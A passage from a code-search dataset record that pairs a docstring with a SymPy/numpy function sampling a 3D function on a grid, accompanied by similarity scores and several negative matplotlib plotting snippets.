"0.5250112",
"0.52382034",
"0.5224161",
"0.5208987",
"0.5190809",
"0.51832134",
"0.51677656",
"0.51570743",
"0.515311",
"0.5142582",
"0.513174",
"0.51237595",
"0.5091958",
"0.5085598",
"0.5073637",
"0.50731343",
"0.5066689",
"0.5061233",
"0.5058502",
"0.50511503",
"0.5049298",
"0.5049225",
"0.5043829",
"0.50145155",
"0.50048983",
"0.5001201",
"0.49840415",
"0.49836764",
"0.49792367",
"0.49741924",
"0.49686757",
"0.49514446",
"0.4930842",
"0.4920208",
"0.49107262",
"0.49102795",
"0.48981068",
"0.48970118",
"0.4890745",
"0.4883478",
"0.48804757",
"0.48777455",
"0.48757064",
"0.48660374",
"0.48660374",
"0.48660374",
"0.48660374",
"0.48511326",
"0.48501474",
"0.4841138",
"0.48366448",
"0.4808465",
"0.4804418",
"0.47917366",
"0.47907928",
"0.47902638",
"0.47868922",
"0.47718102",
"0.4769997",
"0.47679386",
"0.4760289",
"0.474371",
"0.47419068",
"0.4738349",
"0.47312126",
"0.47292277",
"0.4726683",
"0.47210777",
"0.47195193",
"0.47177273",
"0.47152424",
"0.4707087",
"0.47047737",
"0.4702921",
"0.47013605",
"0.47006968",
"0.46991614",
"0.46938",
"0.46927264",
"0.46864608",
"0.4686399",
"0.46809843"
] | 0.7971121 | 0 |
r""" Samples a 3d function f over specified intervals and returns three 2d arrays (X, Y, Z) suitable for plotting with matlab (matplotlib) syntax. See examples\mplot3d.py. f is a function of two variables, such as x2 + y2. x_args and y_args are intervals given in the form (var, min, max, n) | def sample3d(f, x_args, y_args):
x, x_min, x_max, x_n = None, None, None, None
y, y_min, y_max, y_n = None, None, None, None
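    # Coerce f into a SymPy expression so numeric values can be substituted below.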
try:
f = sympify(f)
except SympifyError:
raise ValueError("f could not be interpreted as a SymPy function")
try:
x, x_min, x_max, x_n = x_args
y, y_min, y_max, y_n = y_args
except (TypeError, IndexError):
raise ValueError("x_args and y_args must be tuples of the form (var, min, max, intervals)")
x_l = float(x_max - x_min)
x_d = x_l/float(x_n)
x_a = np.arange(float(x_min), float(x_max) + x_d, x_d)
y_l = float(y_max - y_min)
y_d = y_l/float(y_n)
y_a = np.arange(float(y_min), float(y_max) + y_d, y_d)
    # Build the 2-D coordinate grids of sample points.
    X, Y = np.meshgrid(x_a, y_a)
Z = np.ndarray((len(X), len(X[0])))
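    # Evaluate f at every grid node; substitutions that cannot be converted
    # to a float fall back to 0.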
for j in range(len(X)):
for k in range(len(X[0])):
try:
Z[j][k] = float(f.subs(x, X[j][k]).subs(y, Y[j][k]))
except (TypeError, NotImplementedError):
Z[j][k] = 0
return X, Y, Z | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def draw_f():\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n x_matrix = np.arange(-10, 11, 0.1)\n y_matrix = np.arange(-10, 11, 0.1)\n x_matrix, y_matrix = np.meshgrid(x_matrix, y_matrix)\n # print(x_matrix)\n u_matrix = x_matrix.copy()\n for i in range(x_matrix.shape[0]):\n for j in range(x_matrix.shape[0]):\n u_matrix[i][j] = f(x_matrix[i][j], y_matrix[i][j])\n surf = ax.plot_surface(x_matrix, y_matrix, u_matrix)\n\n plt.show()\n return surf",
"def sample2d(f, x_args):\n try:\n f = sympify(f)\n except SympifyError:\n raise ValueError(\"f could not be interpreted as a SymPy function\")\n try:\n x, x_min, x_max, x_n = x_args\n except (TypeError, IndexError):\n raise ValueError(\"x_args must be a tuple of the form (var, min, max, n)\")\n\n x_l = float(x_max - x_min)\n x_d = x_l/float(x_n)\n X = np.arange(float(x_min), float(x_max) + x_d, x_d)\n\n Y = np.empty(len(X))\n for i in range(len(X)):\n try:\n Y[i] = float(f.subs(x, X[i]))\n except TypeError:\n Y[i] = None\n return X, Y",
"def newplot3(*args, **kwargs):\n\n if 'linewidth' and 'lw' not in kwargs.keys():\n kwargs['linewidth'] = 2\n\n fig = plt.figure(figsize=FIGURE_SIZE, dpi=FIGURE_DPI)\n ax = fig.add_subplot(111, projection='3d')\n\n x = np.asarray(args[0], dtype=float)\n y = np.asarray(args[1], dtype=float)\n z = np.asarray(args[2], dtype=float)\n\n if z.ndim == 2:\n if x.ndim < 2:\n x = np.tile(x, z.shape[1]).reshape(z.T.shape).T\n if y.ndim < 2:\n y = np.tile(y, z.shape[0]).reshape(z.shape)\n\n # Plot each array independently\n for n in range(len(z)):\n ax.plot(x[n], y[n], z[n], *args[3:], **kwargs)\n else:\n ax.plot(*args, **kwargs)",
"def plot3d(data):\n assert span1 == span2\n span = span1\n # ---------------------- create the figure and axes ---------------------- #\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n # -- discretize the definition space and compute the function's images --- #\n X, Y = discretise_space([defspace1, defspace2], n=span)\n Z = data\n\n # ----------------------- appearance and plotting ------------------------ #\n ax.set_zlim(np.min(Z) - 0.5, np.max(Z) + 0.5)\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n ax.set(xlabel='$W\\_C$', ylabel='$W\\_W$', zlabel=\"Utilité\")#,\n # title='Utilité à {} ticks en fonction de W_W et W_C'.format(ticks))\n\n # Plot the surface.\n surf = ax.plot_surface(X, Y, Z, alpha=0.8, #, cmap='binary'\n linewidth=0, antialiased=False, zorder=1)\n\n plt.show()",
"def sample(f, *var_args):\n if len(var_args) == 1:\n return sample2d(f, var_args[0])\n elif len(var_args) == 2:\n return sample3d(f, var_args[0], var_args[1])\n else:\n raise ValueError(\"Only 2d and 3d sampling are supported at this time.\")",
"def plot_3d(results_list): \n x_range = range(len(results_list[0]))\n fig = plt.figure()\n axe = Axes3D(fig)\n\n for idx, result in enumerate(results_list):\n axe.plot(x_range, result, idx)\n plt.show()",
"def drawCurve3D(xlist, ylist, zlist):\n dislin.curv3d(xlist,ylist,zlist,len(xlist))",
"def plot3d(self,datarange=None,nx=100,ny=100,clf=True,cb=True,data='auto',**kwargs):\n from enthought.mayavi import mlab as M\n from operator import isMappingType\n\n if data == 'auto':\n if self.data:\n data = self.data[:2]\n else:\n data = None\n\n if data: #TODO:correct coord conv\n xd,yd = data[0][0],data[0][1]\n if datarange is None:\n datarange = (np.min(xd),np.max(xd),np.min(yd),np.max(yd))\n maxmind = (np.max(data[1]),np.min(data[1]))\n elif datarange is None:\n if self.rangehint is not None:\n datarange = self.rangehint\n else:\n raise ValueError(\"Can't choose limits for plotting without data or a range hint\")\n maxmind = None\n\n grid = np.mgrid[datarange[0]:datarange[1]:1j*nx,datarange[2]:datarange[3]:1j*ny]\n res = self(grid)\n\n# if maxmind:\n# norm = plt.normalize(min(np.min(res),maxmind[1]),max(np.max(res),maxmind[0]))\n# else:\n# norm = plt.normalize(np.min(res),np.max(res))\n\n if clf:\n M.clf()\n\n M.mesh(grid[0],grid[1],res)\n\n if cb:\n if isMappingType(cb):\n M.colorbar(**cb)\n else:\n M.colorbar()\n\n if data:\n if isMappingType(data):\n kwscat = dict(data)\n else:\n kwscat = {}\n zd = data[1]\n zres = zd-self((xd,yd))\n kwscat.setdefault('scale_mode','none')\n kwscat.setdefault('scale_factor','auto')\n g = M.points3d(xd,yd,zd,zres,**kwscat)\n if kwscat['scale_factor'] == 'auto':\n g.glyph.glyph.scale_factor /= 2\n\n #M.xlim(datarange[0],datarange[1])\n #M.ylim(datarange[2],datarange[3])",
"def axis3D(xlow,xhigh,xfirst,xstep,ylow,yhigh,yfirst,ystep,\\\n zlow,zhigh,zfirst,zstep):\n dislin.graf3d(xlow,xhigh,xfirst,xstep,ylow,yhigh,yfirst,ystep,\\\n zlow,zhigh,zfirst,zstep)",
"def surfcut_points(**kwargs):\n npoints = kwargs.get( 'npoints', 240 )\n origin = kwargs.get( 'origin', vec3(0.,0.,0.)) \n normal = kwargs.get( 'normal', (np.pi/2., 0.) ) \n lims0 = kwargs.get( 'lims0', (-50., 50.) ) \n lims1 = kwargs.get( 'lims1', (-50., 50.) ) \n extents = kwargs.get( 'extents', None) \n \n if extents is not None:\n lims0 = (-extents, extents)\n lims1 = (-extents, extents)\n \n # Make the unit vectors that define the plane\n unit = vec3()\n th = normal[0]\n ph = normal[1]\n unit.set_spherical( 1, th, ph) \n orth0 = vec3( -1.*np.sin(ph), np.cos(ph), 0. )\n orth1 = cross(unit,orth0)\n \n t0 = np.linspace( lims0[0], lims0[1], npoints )\n t1 = np.linspace( lims1[0], lims1[1], npoints ) \n \n # Obtain points on which function will be evaluated\n T0,T1 = np.meshgrid(t0,t1)\n X = origin[0] + T0*orth0[0] + T1*orth1[0] \n Y = origin[1] + T0*orth0[1] + T1*orth1[1]\n Z = origin[2] + T0*orth0[2] + T1*orth1[2] \n \n\n # If given an axes it will plot the reference surface to help visusalize\n # the surface cut\n \n # Note that the axes needs to be created with a 3d projection. \n # For example: \n # fig = plt.figure( figsize=(4.,4.) ) \n # gs = matplotlib.gridspec.GridSpec( 1,1 ) \n # ax0 = fig.add_subplot( gs[0,0], projection='3d' ) \n \n ax0 = kwargs.get( 'ax0', None ) \n if ax0 is not None: \n\n # Plot the reference surface\n ax0.plot_surface(X, Y, Z, rstride=8, cstride=8, alpha=0.3, linewidth=0.)\n ax0.set_xlabel('X')\n ax0.set_ylabel('Y')\n ax0.set_zlabel('Z')\n lmin = min([ ax0.get_xlim()[0], ax0.get_ylim()[0], ax0.get_zlim()[0] ] )\n lmax = max([ ax0.get_xlim()[1], ax0.get_ylim()[1], ax0.get_zlim()[1] ] )\n ax0.set_xlim( lmin, lmax )\n ax0.set_ylim( lmin, lmax )\n ax0.set_zlim( lmin, lmax )\n ax0.set_yticklabels([])\n ax0.set_xticklabels([])\n ax0.set_zticklabels([])\n \n # If given an axes and a potential it will plot the surface cut of the \n # potential \n\n ax1 = kwargs.get( 'ax1', None) \n pot = kwargs.get( 'potential', None) \n\n if (ax1 is not None) and (pot is not None):\n # Evaluate function at points and plot\n EVAL = pot.evalpotential(X,Y,Z)\n\n im =ax1.pcolormesh(T0, T1, EVAL, cmap = plt.get_cmap('jet')) \n # cmaps: rainbow, jet\n\n plt.axes( ax1)\n cbar = plt.colorbar(im)\n cbar.set_label(pot.unitlabel, rotation=0 )#self.unitlabel\n \n return T0, T1, X, Y, Z",
"def plot_bivariate_3d(X, Y, Z, bounds, title, **kwargs):\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.set_xticks(np.linspace(bounds[0],bounds[1],6))\n ax.set_yticks(np.linspace(bounds[0],bounds[1],6))\n ax.set_xlim(bounds)\n ax.set_ylim(bounds)\n ax.plot_surface(X,Y,Z, **kwargs)\n plt.title(title)\n plt.show()",
"def plot_results_traj_3d(p_x, p_y, p_z, xmin, xmax, ymin, ymax, zmin, zmax):\n fig, ax = plt.subplots(2 , 2, figsize = (10, 10))\n \n for p in np.arange(0, p_x.shape[0], step = 1): \n for t in np.arange(0, p_x.shape[1], step = 1): \n ax[0,0].plot(t, p_x[p, t], 'rx') \n ax[0,1].plot(t, p_y[p, t], 'gx') \n ax[1,0].plot(t, p_z[p, t], 'bx') \n ax[1,1].plot(t, p_x[p, t], 'rx') \n ax[1,1].plot(t, p_y[p, t], 'gx') \n ax[1,1].plot(t, p_z[p, t], 'bx') \n for a in ax.flat: \n a.set(xlabel = 'Time steps', ylabel = 'Position')\n ax[0,0].set_title('X (pix)') \n ax[0,0].set_ylim([xmin, xmax]) \n ax[0,1].set_title('Y (pix)') \n ax[0,1].set_ylim([ymin, ymax]) \n ax[1,0].set_title('Z (pix)') \n ax[1,0].set_ylim([zmin, zmax])\n ax[1,1].set_title('Positions combined') \n ax[1,1].set_ylim([np.array([xmin, ymin, zmin]).min(), np.array([xmax, ymax, zmax]).max()])",
"def plot_response_surface(f, p, dims=[0,1]):\n import pylab\n if len(dims) == 1:\n xi = dims[0]\n x = pylab.linspace(-10,10,40) - p[xi]\n def value(v):\n p[xi] = v\n return f(p)\n z = [value(v) for v in x]\n pylab.plot(x,z)\n else:\n xi,yi = dims\n x = pylab.linspace(-10,10,40) - p[xi]\n y = pylab.linspace(-10,10,40) - p[yi]\n def value(pt):\n p[xi] = pt[0]\n p[yi] = pt[1]\n return f(p)\n z = np.array([[value((v,w)) for v in x] for w in y])\n pylab.pcolor(x,y,z)",
"def plot_cube(ax: Axes, x: ArrayLike, y: ArrayLike, f_low: callable, f_upp: callable, **kwargs):\n # lower\n xm, ym = np.meshgrid(x, y)\n zm = f_low(xm, ym)\n ax.plot_surface(xm, ym, zm, **kwargs)\n\n # upper\n zm = f_upp(xm, ym)\n ax.plot_surface(xm, ym, zm, **kwargs)\n\n # north\n xm, ym = np.array([x, x]), y[0]*np.ones([2, len(y)])\n zm = np.array([f_low(x, y[0]), f_upp(x, y[0])])\n ax.plot_surface(xm, ym, zm, **kwargs)\n\n # south\n xm, ym = np.array([x, x]), y[-1]*np.ones([2, len(y)])\n zm = np.array([f_low(x, y[-1]), f_upp(x, y[-1])])\n ax.plot_surface(xm, ym, zm, **kwargs)\n\n # east\n xm, ym = x[0]*np.ones([2, len(x)]), np.array([y, y])\n zm = np.array([f_low(x[0], y), f_upp(x[0], y)])\n ax.plot_surface(xm, ym, zm, **kwargs)\n\n # west\n xm, ym = x[-1]*np.ones([2, len(x)]), np.array([y, y])\n zm = np.array([f_low(x[-1], y), f_upp(x[-1], y)])\n ax.plot_surface(xm, ym, zm, **kwargs)",
"def plot_mesh_function(mesh, f, title=\"\", colormap = \"hot\", edges = False, mybounds = [], myticks = []) :\n if mesh.dimension() == 1 :\n # get the mesh points\n x = mesh_axes(mesh)\n # plot the map\n plt.plot(x, f)\n \n elif mesh.dimension() == 2 :\n\n # Get the mesh axes and then make a grid of them for plotting.\n x, y = mesh_axes(mesh)\n X, Y = np.meshgrid(x, y)\n # Reshape the function\n f = f.reshape(mesh.number_cells_x(), mesh.number_cells_y())\n if edges :\n plt.pcolor(X, Y, f, cmap=colormap, edgecolors='k')\n else :\n plt.pcolor(X, Y, f, cmap=colormap)\n plt.axis(\"scaled\") \n plt.xlabel(\"x [cm]\")\n plt.ylabel(\"y [cm]\")\n if len(myticks) :\n cbar = plt.colorbar(boundaries=mybounds,ticks=myticks)\n else : \n cbar = plt.colorbar()\n else :\n print \"not ready for 3d\"\n return\n plt.title(title)\n # show the plot\n plt.show()",
"def eval_r_func_3(f, x, y, t):\n elementary_func = ['prod', 'avg', 'cos_pi', 'sin_pi']\n if f[0] == \"x\":\n return x\n elif f[0] == \"y\":\n return y\n elif f[0] == \"t\":\n return t\n else:\n if f[0] == elementary_func[0]:\n first_argument = eval_r_func_3(f[1], x, y, t)\n second_argument = eval_r_func_3(f[2], x, y, t)\n return first_argument * second_argument\n elif f[0] == elementary_func[1]:\n first_argument = eval_r_func_3(f[1], x, y, t)\n second_argument = eval_r_func_3(f[2], x, y, t)\n return .5*(first_argument + second_argument)\n elif f[0] == elementary_func[2]:\n argument = eval_r_func_3(f[1], x, y, t)\n ans = math.cos(math.pi * argument)\n return ans\n elif f[0] == elementary_func[3]:\n argument = eval_r_func_3(f[1], x, y, t)\n ans = math.sin(math.pi * argument)\n return ans",
"def __create_sample_data__(npts = 20):\n\t#data function\n\tdef wavy(x, y):\n\t\treturn np.sin(0.2*np.pi*x)*np.cos(0.4*np.pi*y)\n\t\n\t#make grid\n\txs = np.linspace(0, 2*20, 2*npts + 1)\n\tys = np.linspace(0, 20, npts + 1)\n\t(xgrid, ygrid) = np.meshgrid(xs, ys)\n\tzgrid = wavy(xgrid, ygrid)\n\t\n\treturn (xgrid, ygrid, zgrid)",
"def show_trace_2d(f, results):\n plt.close()\n # draw input points\n plt.plot(*zip(*results), '-o', color='#ff7f0e')\n # get the field of figure\n x1, x2 = np.meshgrid(np.arange(-5.5, 1.0, 0.1), np.arange(-3.0, 1.0, 0.1))\n # draw the contour of function using x1,x2 as step\n plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()",
"def plotSurface(X):\n from mpl_toolkits.mplot3d import Axes3D\n from mpl_toolkits.mplot3d import proj3d\n f=plt.figure()\n ax=f.add_subplot(111,projection='3d')\n xi=np.arange(10,14,0.05)\n yi=np.arange(12,16,0.05)\n z = matplotlib.mlab.griddata(X[:,0], X[:,1], X[:,2], xi, yi, interp='nn')\n x, y = np.meshgrid(xi, yi)\n ax.plot_surface(x, y, z)\n return f",
"def test_exercise_1():\n a, b = 5, 0\n fvals = []\n grid = np.linspace(-3, 4)\n for value in grid:\n fvals.append(get_test_function(value, a, b))\n plt.plot(grid, fvals)",
"def timeit_plot3D(data, xlabel='xlabel', ylabel='ylabel', **kwargs):\n dataT = {}\n figs = []\n series = kwargs.get('series', (0,1))\n cmap = kwargs.get('cmap', cm.coolwarm)\n for k, v in data.items():\n dataT[k] = zip(*v)\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n X, Y, Z = dataT[k][series[0]], dataT[k][series[1]], dataT[k][-1]\n wide, tall = (max(X)-min(X)+1), (max(Y)-min(Y)+1)\n intervalX = max(X) - min(heapq.nlargest(2,set(X)))\n intervalY = max(Y) - min(heapq.nlargest(2,set(Y)))\n wide, tall = 1+wide/intervalX, 1+tall/intervalY\n X = np.reshape(X, [wide, tall])\n Y = np.reshape(Y, [wide, tall])\n # TODO: BUG: fix so that Z transposes with x & y reversed\n Z = np.reshape(Z, [wide, tall])\n surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cmap, linewidth=0, antialiased=False)\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.set_title(substitute_titles(k,series))\n fig.colorbar(surf, shrink=0.5, aspect=5)\n figs.append(fig)\n return figs",
"def plot_surface(\n condition: bool,\n function: typing.Callable,\n x: typing.List[float],\n t: typing.List[float],\n p: typing.List[float],\n t_min: float,\n t_max: float,\n x_v: numpy.array,\n):\n # TODO: docstring\n fig = plt.figure()\n ax = fig.add_subplot(projection=\"3d\")\n\n if condition:\n ax.scatter(x, t, p, marker=\"o\")\n\n t_v = numpy.linspace((t_min - 10), (t_max + 10), num=50)\n x_fit, t_fit = numpy.meshgrid(x_v, t_v)\n p_fit = numpy.array([function(x_fit[i], t_fit[i]) for i in range(len(x_fit))])\n ax.plot_surface(x_fit, t_fit, p_fit, alpha=0.2)\n\n ax.set_xlabel(\"First component fraction\")\n ax.set_ylabel(\"Temperature K\")\n ax.set_zlabel(\"Permeance\")\n fig.suptitle(\"Fit Illustration\", fontsize=10)\n plt.show()",
"def fcontourf(f, x1range, x2range, yrange, **kwargs):\n x1s = np.linspace(x1range[0], x1range[1])\n x2s = np.linspace(x2range[0], x2range[1])\n ys = np.linspace(yrange[0], yrange[1], 20)\n fs = [[f(np.array([x1,x2])) for x1 in x1s] for x2 in x2s]\n plt.contourf(x1s, x2s, fs, ys, **kwargs)\n plt.axis('scaled')",
"def plot(vec):\n\n # ADDITIONAL CODE, to see what the ranges are of the features\n # get a list containing all the first features and second features, respectively\n # feature_1 = list(map(lambda x: x[0], vec))\n # feature_2 = list(map(lambda x: x[1], vec))\n # x = np.arange(min(feature_1), max(feature_1), delta)\n # y = np.arange(min(feature_2), max(feature_2), delta)\n\n fig = plt.figure()\n ax = Axes3D(fig)\n\n # make a numpy arange from the minimum feature until the maximum features\n # delta is the size of spacing between samples\n delta = 0.1\n x = np.arange(-2.0, 4.0, delta)\n y = np.arange(-3.0, 4.0, delta)\n\n # make a 2-D grind\n x, y = np.meshgrid(x, y)\n\n # assign bivariate Gaussian distribution for equal shape X, Y.\n z1 = mlab.bivariate_normal(x, y, sigmax=1.0, sigmay=1.0, mux=0.0, muy=0.0)\n z2 = mlab.bivariate_normal(x, y, sigmax=1.5, sigmay=0.5, mux=1, muy=1)\n z = 10.0 * (z2 - z1)\n\n # create surface plot\n ax.plot_surface(x, y, z, cmap=cm.coolwarm, linewidth=0, antialiased=False)\n plt.savefig(\"./graphs/figures/f1_2surf3n.png\")\n\n \"\"\"\n # create contour plot\n contour_plot = plt.contour(x, y, z)\n # assign labels and title\n plt.clabel(contour_plot, inline=1, fontsize=10)\n plt.title('Feature 1 against feature 2')\n plt.savefig(\"./graphs/figures/f1_2n.png\")\n \"\"\"",
"def function_3d(point):\n return point[0]**2 + point[1]**2 + point[2]**2 - 1",
"def plot_results_3d(p_x, p_y, p_z, h_exp = 0.5):\n plt.figure(figsize = (10, 10))\n ax3d = plt.axes(projection = '3d') \n\n color=iter(cm.rainbow(np.linspace(0,1,p_x.shape[0]))) # (1)\n labels = ['Particle ' + str(pl+1) for pl in np.arange(0, p_x.shape[0], step = 1)]\n \n for p in np.arange(0, p_x.shape[0], step = 1): \n c = next(color) # (1)\n for t in np.arange(0, p_x.shape[1], step = 1): \n ax3d.plot3D(p_x[p, t], p_y[p, t], p_z[p, t], 'x', c = c, label = labels[p]) \n legend_without_duplicate_labels(ax3d)\n ax3d.set_xlabel('X (pixels)') \n ax3d.set_ylabel('Y (pixels') \n ax3d.set_zlabel('Z (pixels)') \n ax3d.set_xlim([origin-150,origin+150])\n ax3d.set_ylim([origin-150,origin+150])\n ax3d.set_zlim([origin-150,origin+150])\n ax3d.set_title('3D particle trajectories - H = ' + str(h_exp))",
"def show_trace_2d(f, results): #@save\n set_figsize()\n plt.plot(*zip(*results), '-o', color='#ff7f0e')\n x1, x2 = torch.meshgrid(torch.arange(-5.5, 1.0, 0.1),torch.arange(-3.0, 1.0, 0.1))\n plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n plt.xlabel('x1')",
"def apply_PSFvar3Dz(x, z, a):\n N1, N2, N3 = x.shape\n Hxz = np.zeros((N1, N2))\n\n p3 = int((a.shape[2]-1)/2)\n\n zmin = max(0,z-p3)\n zmax = min(N3,z+p3+1)\n\n for n3 in range(zmin,zmax):\n bF2 = conv2D_fourier(x[:,:,n3], a[:,:,z-n3+p3])\n Hxz = Hxz + bF2\n\n return Hxz",
"def list_plot3d_tuples(v, interpolation_type, texture, **kwds):\n from matplotlib import tri, delaunay\n import numpy\n import scipy\n from random import random\n from scipy import interpolate\n from .plot3d import plot3d\n\n if len(v)<3:\n raise ValueError(\"We need at least 3 points to perform the interpolation\")\n\n x = [float(p[0]) for p in v]\n y = [float(p[1]) for p in v]\n z = [float(p[2]) for p in v]\n\n # If the (x,y)-coordinates lie in a one-dimensional subspace, the\n # matplotlib Delaunay code segfaults. Therefore, we compute the\n # correlation of the x- and y-coordinates and add small random\n # noise to avoid the problem if needed.\n corr_matrix = numpy.corrcoef(x, y)\n if corr_matrix[0, 1] > 0.9 or corr_matrix[0, 1] < -0.9:\n ep = float(.000001)\n x = [float(p[0]) + random()*ep for p in v]\n y = [float(p[1]) + random()*ep for p in v]\n\n\n # If the list of data points has two points with the exact same\n # (x,y)-coordinate but different z-coordinates, then we sometimes\n # get segfaults. The following block checks for this and raises\n # an exception if this is the case.\n # We also remove duplicate points (which matplotlib can't handle).\n # Alternatively, the code in the if block above which adds random\n # error could be applied to perturb the points.\n drop_list = []\n nb_points = len(x)\n for i in range(nb_points):\n for j in range(i+1, nb_points):\n if x[i] == x[j] and y[i] == y[j]:\n if z[i] != z[j]:\n raise ValueError(\"Two points with same x,y coordinates and different z coordinates were given. Interpolation cannot handle this.\")\n elif z[i] == z[j]:\n drop_list.append(j)\n x = [x[i] for i in range(nb_points) if i not in drop_list]\n y = [y[i] for i in range(nb_points) if i not in drop_list]\n z = [z[i] for i in range(nb_points) if i not in drop_list]\n\n xmin = float(min(x))\n xmax = float(max(x))\n ymin = float(min(y))\n ymax = float(max(y))\n\n num_points = kwds['num_points'] if 'num_points' in kwds else int(4*numpy.sqrt(len(x)))\n #arbitrary choice - assuming more or less a nxn grid of points\n # x should have n^2 entries. 
We sample 4 times that many points.\n\n if interpolation_type == 'linear':\n T = tri.Triangulation(x, y)\n f = tri.LinearTriInterpolator(T, z)\n j = numpy.complex(0, 1)\n from .parametric_surface import ParametricSurface\n def g(x, y):\n z = f(x, y)\n return (x, y, z)\n G = ParametricSurface(g, (list(numpy.r_[xmin:xmax:num_points*j]), list(numpy.r_[ymin:ymax:num_points*j])), texture=texture, **kwds)\n G._set_extra_kwds(kwds)\n return G\n\n if interpolation_type == 'nn' or interpolation_type =='default':\n\n T=delaunay.Triangulation(x,y)\n f=T.nn_interpolator(z)\n f.default_value=0.0\n j=numpy.complex(0,1)\n vals=f[ymin:ymax:j*num_points,xmin:xmax:j*num_points]\n from .parametric_surface import ParametricSurface\n def g(x,y):\n i=round( (x-xmin)/(xmax-xmin)*(num_points-1) )\n j=round( (y-ymin)/(ymax-ymin)*(num_points-1) )\n z=vals[int(j),int(i)]\n return (x,y,z)\n G = ParametricSurface(g, (list(numpy.r_[xmin:xmax:num_points*j]), list(numpy.r_[ymin:ymax:num_points*j])), texture=texture, **kwds)\n G._set_extra_kwds(kwds)\n return G\n\n if interpolation_type == 'spline':\n from .plot3d import plot3d\n kx = kwds['kx'] if 'kx' in kwds else 3\n ky = kwds['ky'] if 'ky' in kwds else 3\n if 'degree' in kwds:\n kx = kwds['degree']\n ky = kwds['degree']\n s = kwds['smoothing'] if 'smoothing' in kwds else len(x)-numpy.sqrt(2*len(x))\n s = interpolate.bisplrep(x, y, z, [int(1)]*len(x), xmin, xmax, ymin, ymax, kx=kx, ky=ky, s=s)\n f = lambda x,y: interpolate.bisplev(x, y, s)\n return plot3d(f, (xmin, xmax), (ymin, ymax), texture=texture, plot_points=[num_points, num_points], **kwds)",
"def F3d_2_vtkFromat(F3d):\n #asign variables\n [Fx,Fy,Fz] = F3d\n \n #generate the output array\n F3dVTK = N.array([N.zeros(3) for i in range(len(Fx)*len(Fy[0])*len(Fz[0][0]))])\n \n #loop and rearange\n c=0\n for k in range(len(Fz)):\n for j in range(len(Fz[0])):\n for i in range(len(Fz[0][0])):\n #fariables corresponding with the point\n fxn = Fx[k][j][i]\n fyn = Fy[k][j][i]\n fzn = Fz[k][j][i]\n F3dVTK[c] = N.array([fxn,fyn,fzn])\n #update counter \n c = c+1\n \n return F3dVTK",
"def interpolate_2d(x, y, z):\n X = np.linspace(min(x), max(x))\n Y = np.linspace(min(y), max(y))\n X, Y = np.meshgrid(X, Y)\n #f = interpolate.interp2d(x, y, z)\n #Z = f(X[0, :], Y[:, 0])\n f = interpolate.LinearNDInterpolator(zip(x, y), z)\n Z = f(X, Y)\n return X, Y, Z",
"def vector3(x, y, z):\n return np.array([x, y, z], dtype=np.float)",
"def mpl_multivariate_3d_gd(\n filename: str= \"\",\n name_labels: List[str] = [],\n colors: List[str] = [],\n functions: list = [], # list of funtions\n target_function: List[np.ndarray] = [],\n cmap_target: List[str] = [],\n label_target: List[str] = [],\n fedavg_clients=None,\n fedavg_eval=None,\n fedavg_communication_rounds: List[int] = [10],\n fedavg_steps_local: List[int] = [10],\n title: str = \"\",\n hist_slice=slice(None),\n theta=START_THETA,\n):\n assert (\n len(name_labels) == len(colors) == len(functions)\n ), \"incorrect settings. for each function, specify a matplotlib color and label name\"\n\n assert (\n len(target_function) == len(cmap_target) == len(label_target)\n ), \"incorrect settings. only one target function can be plotted\"\n\n print(\n f\"create 3D plot using SGD on {list(zip(name_labels, colors))} \"\n f\"over distribution {list(zip(label_target, cmap_target))}\"\n )\n\n # 3D Settings\n fig = plt.figure()\n ax = fig.gca(projection=\"3d\")\n #ax.set_zlim(-0.15, 0.2)\n ax.set_zticks(np.linspace(0, 0.2, 5))\n\n offset_contour = -0.03\n ax.view_init(elev=20.0, azim=-125)\n ax.dist = 7.5\n\n ax.set_xlabel(r\"${\\theta}_0$\")\n ax.set_ylabel(r\"${\\theta}_1$\")\n ax.set_zlabel(r\"J(${\\theta}_0$, ${\\theta}_1$)\")\n\n # history of regular GD\n for i in range(len(name_labels)):\n history = grad_descent(functions[i], theta = theta)\n history = history[hist_slice]\n ax.plot(\n history[:, 0],\n history[:, 1],\n history[:, 2],\n label=name_labels[i],\n c=colors[i],\n lw=5,\n zorder=100,\n )\n ax.plot(\n history[:, 0],\n history[:, 1],\n np.full_like(history[:, 1], offset_contour+0.001),\n lw=2,\n c=colors[i],\n zorder=100,\n )\n\n # history of FedAvg\n if fedavg_clients is not None:\n for i in range(len(fedavg_communication_rounds)):\n hs, h_clients = fedavg(\n fedavg_clients,\n fedavg_eval,\n fedavg_communication_rounds[i],\n fedavg_steps_local[i],\n theta=theta,\n )\n hs = hs[hist_slice]\n hs = hs[hist_slice]\n ax.plot(hs[:, 0], hs[:, 1], hs[:, 2], label=\"FedAvg\", c=\"red\", lw=5, zorder=100)\n # on contour plot\n ax.plot(\n hs[:, 0],\n hs[:, 1],\n np.full_like(hs[:, 1], offset_contour+0.001),\n lw=2,\n c=\"red\",\n zorder=100,\n )\n\n print(title, hs[-1, :])\n\n # plot target function\n for i in range(len(target_function)):\n # Create a surface plot and projected filled contour plot under it.\n ax.plot_wireframe(\n X,\n Y,\n target_function[i],\n rstride=3,\n cstride=3,\n linewidth=0.5,\n antialiased=True,\n cmap=cmap_target[i],\n label=label_target[i],\n zorder=1,\n )\n ax.contourf(\n X,\n Y,\n target_function[i],\n zdir=\"z\",\n offset=offset_contour,\n cmap=cmap_target[i],\n zorder=0,\n alpha=.97,\n )\n\n ax.legend()\n if title:\n ax.set_title(title)\n if filename:\n fig.savefig(f\"{filename}.svg\")\n\n if \"mpld3\" in sys.modules:\n try:\n mpld3.save_html(fig, f\"{filename}.html\")\n except:\n pass\n # try to creat figure mpld3, but 3d plots are not supported.\n return fig",
